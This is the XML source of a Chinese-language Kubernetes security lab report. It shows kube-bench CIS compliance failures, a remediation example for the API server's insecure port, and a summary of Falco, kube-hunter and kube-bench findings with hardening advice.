    <w:p w14:paraId="5CE5332C" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE8FE97" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>[FAIL] 1.1.11 Ensure that the etcd data directory permissions are set to 700 or more restrictive (Automated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087BDE5F" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>[FAIL] 1.1.12 Ensure that the etcd data directory ownership is set to etcd:etcd (Automated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E8B20" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFC0F56" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>[FAIL] 1.2.7 Ensure that the --authorization-mode argument is not set to AlwaysAllow (Automated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E51F5F" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>[FAIL] 1.2.19 Ensure that the --insecure-port argument is set to 0 (Automated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F16424" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429B90D2" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>== Summary master ==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650F96AA" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>17 checks PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2213D173" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>37 checks FAIL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56EC83" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>11 checks WARN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABC3F39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解读：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D23B42" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[PASS]：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22112">
        <w:t>符合安全要求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36382CBE" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[FAIL]：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22112">
        <w:t>不符合，需要修复。例如 1.2.7 要求不能使用 AlwaysAllow 授权模式，必须启用 RBAC。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24193FBB" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[WARN]：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22112">
        <w:t>建议手动检查的项目。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AEA014" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:t>每个 FAIL 项下方都附有修复建议（Remediations），例如修改 API server 配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140137C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修复示例（针对 1.2.19）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12382509" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:r w:rsidRPr="00C22112">
        <w:t>Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml and set --insecure-port=0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF18B76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解读：按建议修改配置文件并重启 API server 即可修复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637FEDE4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lastRenderedPageBreak/>
        <w:pict w14:anchorId="499C8FC2">
          <v:rect id="_x0000_i1107" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD638FB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六、总结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644"/>
        <w:gridCol w:w="4404"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C22112" w:rsidRPr="00C22112" w14:paraId="034ED2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4BB9D" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C22112">
              <w:rPr>
                <w:b/>
                <w:bCs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6C58" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C22112">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>主要发现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64E8" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C22112">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>修复/应对建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C22112" w:rsidRPr="00C22112" w14:paraId="5BA008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897C6" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>Falco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2893" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>可检测反弹 shell 等实时攻击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6F3C" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>部署并配置自定义规则，集成告警通道（如 Slack）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C22112" w:rsidRPr="00C22112" w14:paraId="1FC34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01B37" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>kube-hunter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D12A" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>发现 CAP_NET_RAW 能力和版本泄露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1D56" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>禁用非必要能力，限制版本端点访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C22112" w:rsidRPr="00C22112" w14:paraId="55C14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5431B" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>kube-bench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C1C80" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>发现多个 CIS 配置不合规项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E5574" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
            <w:r w:rsidRPr="00C22112">
              <w:t>按 remediation 指南逐一加固集群配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72AE93CC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通过本次实践，你已掌握：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E68FCAF" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>在 K8s 集群中部署 Falco 并添加自定义规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB29DEB" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>使用 kube-hunter 主动扫描集群弱点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60F9C4" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>使用 kube-bench 进行合规性检查并理解报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125AB34A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下一步学习建议：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9CE49E" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>学习 OPA Gatekeeper 实现策略即代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB46DB" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>学习 Trivy 扫描容器镜像漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DA2802" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>搭建本地 K8s 集群进行更深入实验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373DB682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pict w14:anchorId="1643EB88">
          <v:rect id="_x0000_i1108" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F74A3" w14:textId="77777777" w:rsidR="00C22112" w:rsidRPr="00C22112" w:rsidRDefault="00C22112" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>报告结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD0EA73" w14:textId="77777777" w:rsidR="007C1A9A" w:rsidRPr="00C22112" w:rsidRDefault="007C1A9A" w:rsidP="00C22112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="007C1A9A" w:rsidRPr="00C22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9F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CF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2707F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08C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3530C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="681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5917"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="099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55919"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6C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4406A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECC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61B5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="196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E4C39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8B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75538"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3EC0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95FDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3E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668EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F12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231DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C9D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F5044"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05B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44A67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="330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74203"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E2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78837">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1603957488">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="52893492">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="531890263">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="24060169">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1036589082">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="710106173">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1294288905">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="173806926">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="223368903">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="366413293">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1664620219">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1884630721">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="217056343">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="64187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71"/>
    <w:rsid w:val="001B5A90"/>
    <w:rsid w:val="005B258F"/>
    <w:rsid w:val="007C1A9A"/>
    <w:rsid w:val="00836940"/>
    <w:rsid w:val="008E51BB"/>
    <w:rsid w:val="009A2B34"/>
    <w:rsid w:val="00B50071"/>
    <w:rsid w:val="00BE3171"/>
    <w:rsid w:val="00C22112"/>
    <w:rsid w:val="00C263A4"/>
    <w:rsid w:val="00FA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6565"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DED5125E-5990-4080-B469-7FB53438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3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1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1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1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1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1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31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31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1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1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3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鹤胡</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>鹤胡</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-14T12:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-14T13:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>